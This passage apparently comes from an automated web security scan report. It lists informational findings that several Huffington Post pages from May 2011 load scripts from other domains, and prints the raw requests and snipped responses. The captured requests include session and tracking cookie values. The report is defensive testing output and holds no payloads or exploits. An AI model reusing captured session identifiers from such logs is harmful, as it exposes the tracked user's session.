       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js%2Cslideshow%2Fpollajax.js&v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&v47014"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=hp_scrollbar.css" type="text/css" media="screen" />
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js&extra3"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=twitter_clientside.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&v46884"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.114. http://www.huffingtonpost.com/2011/05/04/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/04/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://o.aolcdn.com/ads/adsWrapper.js
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&v47007
http://s.huffpost.com/assets/js.php?f=v.js&v47053
http://s.huffpost.com/assets/js.php?f=val.js
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /2011/05/04/ HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 140601
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=300
Date: Thu, 05 May 2011 10:58:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Wire Services" href="http://www.huffingtonpost.com/wires/full_index.rdf" />
       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&v47053"></script>


<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=val.js"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.115. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/04/cnn-poll-finds-that-most-_n_857597.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://o.aolcdn.com/ads/adsWrapper.js
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007
http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&v46884
http://s.huffpost.com/assets/js.php?f=v.js&v47053
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /2011/05/04/cnn-poll-finds-that-most-_n_857597.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 256417
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:58:26 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=ie.css%2Cie7.css&v46998" type="text/css" media="screen" />
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&v47053"></script>
...[SNIP]...

<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&v46884"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.116. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/04/osama-bin-laden-pictures_n_857568.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://o.aolcdn.com/ads/adsWrapper.js
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007
http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&v46884
http://s.huffpost.com/assets/js.php?f=v.js&v47014
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /2011/05/04/osama-bin-laden-pictures_n_857568.html HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.6.10.1304575105; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; s_pers=%20s_getnr%3D1304575170358-New%7C1367647170358%3B%20s_nrgvo%3DNew%7C1367647170363%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Breaking%25252520News%25252520and%25252520Opinion%25252520on%25252520The%25252520Huffington%25252520Post%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:22 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 279875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=print-view.css" type="text/css" media="print" />


   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&v47014"></script>
...[SNIP]...

<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&v46884"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.117. http://www.huffingtonpost.com/advertise/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/advertise/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://api.recaptcha.net/challenge?k=6Lfu8wAAAAAAAMM1JCZ2z5Ft0VaTS3hB3srqt41R
http://o.aolcdn.com/ads/adsWrapper.js
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007
http://s.huffpost.com/assets/js.php?f=v.js&v47053
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js
http://yui.yahooapis.com/2.8.0r4/build/calendar/calendar-min.js
http://yui.yahooapis.com/2.8.0r4/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET /advertise/ HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 96406
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=169
Date: Thu, 05 May 2011 10:58:27 GMT
Connection: close

<script>
ad_ears_on = true;

</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=ie.css%2Cie7.css&v46998" type="text/css" media="screen" />
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&v47053"></script>
...[SNIP]...

<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0r4/build/yahoo-dom-event/yahoo-dom-event.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0r4/build/calendar/calendar-min.js"></script>
...[SNIP]...
<div>
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Lfu8wAAAAAAAMM1JCZ2z5Ft0VaTS3hB3srqt41R"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.118. http://www.huffingtonpost.com/imam-feisal-abdul-rauf/bin-laden-terrorism_b_857345.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/imam-feisal-abdul-rauf/bin-laden-terrorism_b_857345.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://o.aolcdn.com/ads/adsWrapper.js
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js%2Ctwitter_serverside.js
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007
http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&v46884
http://s.huffpost.com/assets/js.php?f=v.js&v47053
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /imam-feisal-abdul-rauf/bin-laden-terrorism_b_857345.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
